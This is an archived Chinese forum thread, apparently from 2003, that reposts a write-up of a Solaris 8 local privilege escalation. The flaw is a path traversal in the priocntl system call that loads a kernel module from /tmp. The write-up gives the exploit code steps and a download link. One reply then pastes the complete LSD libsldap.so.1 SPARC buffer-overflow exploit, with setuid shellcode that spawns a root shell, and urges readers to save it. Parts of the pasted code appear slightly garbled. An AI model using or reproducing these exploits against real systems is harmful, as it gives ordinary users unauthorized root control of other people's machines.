Solaris8模块加载严重系统漏洞

Solaris8模块加载严重系统漏洞

（该漏洞不依赖任何其他的setuid程序）
最近，我在Solaris8上研究内核模块问题时，意外发现，
Solaris8在执行内核模块加载过程中，存在严重系统漏洞。
作为结果，任何普通用户都将可以拥有root权限。我们知道
Solaris上出现了很多系统漏洞，他们中的很多是缓冲区溢出
漏洞，利用这种类型的漏洞必须要求含有该漏洞的可执行文件
具有setuid标志。而大多数有经验的管理员已经将这些文件
的setuid标志去掉了。我下面介绍的方法不依赖任何其他的
setuid程序，就是说，你有执行程序的权利，你就是root了！

先让我们了解一下内核模块的基本知识，现代操作系统
大多拥有两种工作状态：核心态和用户态。我们使用的一般
应用程序工作在用户态，而内核模块和最基本的操作系统核
心一同工作在核心态。
为什么不在操作系统核心中实现所有功能，而要使用内
核模块呢？因为随着软件技术的向前发展，操作系统核心需
要支持的功能越来越多，体积也越来越大，如果在操作系统
核心中实现所有功能我们就将拥有一个庞大而缓慢的操作系
统内核了。
内核模块提供给我们一个较好的解决方案：在操作系统
启动时，仅加载最核心的部分，随着使用的应用程序需要，
再由操作系统动态的将相关的内核模块加载到核心态，不用
的时候就可以将这些模块卸载出内存。这样我们的内核就可
以即功能强大，又小巧快捷了。

现在步入正题，我们知道黑客们总是将获得root权限作
为目的，其实如果你可以在核心态运行你的程序，你一样可
以获得一般账号没有的权限，甚至比root权限更高级的权限。
因为操作系统只在用户态对用户权限进行限制。换句话说，
就是如果你可以在核心态运行你的程序，那么你就可以为所
欲为了。所以一般操作系统都只准许root账号来加载这种可
以运行在核心态的内核模块，Solaris8也不例外
（modload命令）。
但是在Solaris8上还有一些其他的命令（或系统调用），
可以最终导致系统加载内核模块，这些命令中的一些不需要
root账号。当然对于那些总是加载固定内核模块的命令，他
们也是安全的。那么有没有不需要root账号而又可以指定加
载某个内核模块的命令呢？
有！priocntl系统调用就是一个。priocntl是和进程切
换相关的一条系统调用，当他的第三个参数是PC_GETCID时，
他会加载在第四个参数中指定的内核模块。例：
......
pcinfo_t pcinfo;
strcpy(pcinfo.pc_clname, "RT");
if(priocntl(0,0,PC_GETCID,(caddr_t)&pcinfo)==-1)
printf("error = d!\n",errno);
else
printf("OK!\n");
......
编译并运行他，然后利用命令"modinfo | grep RT"我们会发
现RT内核模块被Solaris8加载了。
好！这是最关键的地方，也是产生漏洞的地方！priocntl
系统调用加载内核模块的缺省路径是/kernel/sched和
/usr/kernel/sched（除非你在/etc/system文件中指定的其他
路径），而这两个路径及其中的文件都是只有root才有写权限
的，我们无法将自己的内核模块放到这两个目录中，但是！
priocntl居然支持"../"！！！改写的代码如下：
......
pcinfo_t pcinfo;
strcpy(pcinfo.pc_clname, "../../tmp/gsu");
if(priocntl(0,0,PC_GETCID,(caddr_t)&pcinfo)==-1)
printf("error = d!\n",errno);
else
printf("OK!\n");
......
然后编写一个自己的内核模块gsu,并放到/tmp目录下（/tmp目
录对我们是有写权限的）。OK！Solaris8将gsu加载到内核了！！
这里还有一个小问题，就是如果这个内核模块成功加载了，
那么Solaris8将使用这个内核模块，那就不知道会发生什么了。
可是我们的目的不是要加载这个内核模块，我们只需要我们的
代码运行在核心态就可以了，可以编写模块代码如下：
#include <sys/modctl.h>
#include <sys/sunddi.h>
_init()
{
/* 在这里加入我们需要的代码 */
return -1;
}
_info(struct modinfo *modinfop)
{
return -1;
}
在函数_init中返回-1，表示加载模块失败，但没关系，我们
的代码已经运行了。

可以利用了上述功能将一个文件的所有者修改为root。而
这个文件恰恰拥有可执行和setuid标志......
其实，我们使用上述功能修改文件所有者，已经是"大才
小用"了,利用它我们可以实现隐藏文件，隐藏进程，截获系统
调用等等一切可以想到的功能。

那么，我们如何防止这种黑客行为呢？
屏蔽priocntl系统调用？（怎么做能实现？）
取消所有用户的执行程序权限？（#￥#￥#￥）
我们还是盼望SUN公司尽早推出对应这个漏洞的patch吧！

上述漏洞，已通知Sun Microsystems.
（转载请注明作者）

警 告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。
使用者风险自负！

代码下载：http://www.mycgiserver.com/~jerryhj/Gsu.zip (18K)
（该网站连接不稳定，请多试几遍）
[color=blue:c877244228][/color:c877244228]

x3y4z5 回复于：2003-01-16 15:29:18

好文章，谢谢。

heynj 回复于：2003-01-16 16:09:52

good!! up!!

kmsina 回复于：2003-01-16 17:18:14

已经有这样的本地攻击程序了，而且成功率很高

愣头清 回复于：2003-01-16 17:41:09

这个代码是hack.co.za上2001年7月才发布的,想必很多人都没有,赶快收好吧!!  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  /*## copyright LAST STAGE OF DELIRIUM jun 2001 poland        *://lsd-pl.net/ #*/  /*## libsldap.so.1                                                           #*/  #define NOPNUM 16000  #define ADRNUM 512  char setuidcode[]=  "\x90\x08\x3f\xff"     /* and     %g0,-1,%o0           */  "\x82\x10\x20\x17"     /* mov     0x17,%g1             */  "\x91\xd0\x20\x08"     /* ta      8                    */  ;  char shellcode[]=  "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */  "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */  "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */  "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */  "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */  "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */  "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */  "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */  "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */  "\x91\xd0\x20\x08"     /* ta      8                    */  "/bin/ksh"  ;  char jump[]=  "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */  "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */  ;  static char nop[]="\x80\x1c\x40\x11";  main(int argc,char **argv){  char buffer[30000],adr[4],*b,*envp[3];  int i,n=-1;  printf("copyright LAST STAGE OF DELIRIUM jun 2001 poland  //lsd-pl.net/\n");  printf("libsldap.so.1 solaris 2.8 sparc\n\n");  if(argc==1){       printf("usage: %s {passwd|chkey|sendmail}\n",argv[0]);exit(-1);  }  if(!strcmp(argv[1],"passwd")) n=0;  if(!strcmp(argv[1],"chkey")) n=1;  if(!strcmp(argv[1],"sendmail")) n=2;  if(n==-1) exit(-1);  *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+14900+8000;  envp[0]=&buffer[0];  envp[1]=&buffer[1000];  envp[2]=0;  b=&buffer[0];  sprintf(b,"LDAP_OPTIONS=");  b+=13;  for(i=0;i<ADRNUM;i++) *b++=adr[i%4];  *b=0;  b=&buffer[1000];  sprintf(b,"xxx=  ");  b+=4+2;  for(i=0;i<16000;i++) *b++=nop[i%4];  for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode;  for(i=0;i<strlen(shellcode);i++) *b++=shellcode;  *b=0;  switch(n){  case 0: execle("/usr/bin/passwd","lsd",0,envp);  case 1: execle("/usr/bin/chkey","lsd",0,envp);  case 2: execle("/usr/lib/sendmail","lsd",0,envp);  }  }  /*                www.hack.co.za       [10 July 2001]*/  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

原文转自：http://www.ltesting.net